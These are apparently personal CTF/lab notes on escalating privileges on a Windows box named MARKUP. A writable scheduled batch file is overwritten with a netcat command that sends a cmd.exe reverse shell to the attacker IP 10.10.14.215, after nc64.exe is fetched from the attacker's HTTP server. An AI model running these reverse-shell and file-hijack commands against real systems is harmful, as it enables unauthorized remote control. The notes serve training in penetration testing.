BATCH FILES

#privesc
#check current privileges
daniel@MARKUP C:\Users\daniel> whoami /priv
 Privilege Name                Description                    State
 ============================= ============================== =======
 SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
 SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

 * nothing pertinent
 
daniel@MARKUP C:\Users\daniel> dir c:\ 
 Volume in drive C has no label.   
 Volume Serial Number is BA76-B4E3 

 Directory of c:\

 03/12/2020  03:56 AM    <DIR>          Log-Management
 07/28/2021  03:38 AM                 0 Recovery.txt

 * these are the only two UNCOMMON files
    - always analyze UNCOMMON files prior to going into a rabbit hole
    
daniel@MARKUP C:\Users\daniel> type c:\Recovery.txt 
 blank file

daniel@MARKUP C:\Users\daniel> dir c:\Log-Management
 Volume in drive C has no label. 
 Volume Serial Number is BA76-B4E3

 Directory of c:\Log-Management

 03/06/2020  02:42 AM               346 job.bat

daniel@MARKUP C:\Users\daniel> type c:\Log-Management\job.bat 
 @echo off 
 FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
 IF (%adminTest%)==(Access) goto noAdmin
 for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
 echo.
 echo Event Logs have been cleared!
 goto theEnd
 :do_clear
 wevtutil.exe cl %1
 goto :eof
 :noAdmin
 echo You must run this script as an Administrator!
 :theEnd
 exit

 * understand the purpose of the batch file and what can be manipulated

#view file permission
daniel@MARKUP C:\Users\daniel> icacls c:\Log-Management\job.bat
 c:\Log-Management\job.bat BUILTIN\Users:(F)
                           NT AUTHORITY\SYSTEM:(I)(F)
                           BUILTIN\Administrators:(I)(F)
                           BUILTIN\Users:(I)(RX)

 Successfully processed 1 files; Failed processing 0 files


 * the wevtutil is used to interact with the Windows Event Log service
    - it can retrieve information about event logs and publishers and can 
      also install and uninstall event manifests, run queries and 
      export, archive and clear logs
    - the el (enumerate logs) parameter lists all event logs currently available
      on the system
    - the cl (clear log) clears the specified event log.
    
 * the icacls cmd is used to view, modify, back up, and restore NTFS file 
   and folder permissions (Access Control Lists, or ACLs).
    - it’s the modern replacement for older tools like cacls and xcacls.
    
 * the group BUILTIN\Users has full control (F) over the file. The BUILTIN\Users 
   group represents all local users
    - this includes the user Daniel


#use the batch script to execute the transferred netcat IOT execute a reverse shell
daniel@MARKUP C:\Users\daniel>tasklist /V
 ERROR: Access denied

daniel@MARKUP C:\Users\daniel>powershell
 Windows PowerShell
 Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\daniel> get-process

 Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id   SI ProcessName
 -------  ------    -----      -----     ------     --   -- -----------

 31       5         736        2068                 1824 1  wevtutil
 
root@htb:~$ wget https://github.com/rahuldottech/netcat-for-windows/releases/download/1.12/nc64.exe
 2025-05-10 21:42:31 (105 MB/s) - ‘nc64.exe’ saved [45272/45272]
 
root@htb:~$ python3 -m http.server 8081

PS C:\Users\daniel> wget http://10.10.14.215:8081/nc64.exe -OutFile nc64.exe
PS C:\Users\daniel> cmd
daniel@MARKUP C:\Users\daniel> cd c:\Log-Management
daniel@MARKUP c:\Log-Management>copy c:\users\daniel\nc64.exe c:\Log-Management
 1 file(s) copied.
daniel@MARKUP C:\Users\daniel> echo C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.215 4321 > C:\Log-Management\job.bat

 * DO NOT enclosed the values in quotes!

daniel@MARKUP c:\Log-Management>type job.bat 
 C:\Log-Management\nc64.exe -e cmd.exe 10.10.14.215 4321

root@htb:~$ nc -nlvp 4321
 ...
 
 * wait for the script to execute
 
root@htb:~$ nc...
 listening on [any] 4321 ...
 connect to [10.10.14.215] from (UNKNOWN) [10.129.24.24] 49686
 Microsoft Windows [Version 10.0.17763.107]
 (c) 2018 Microsoft Corporation. All rights reserved.

PreviousEXECUTION NextPSEXEC.PY

Last updated 7 months ago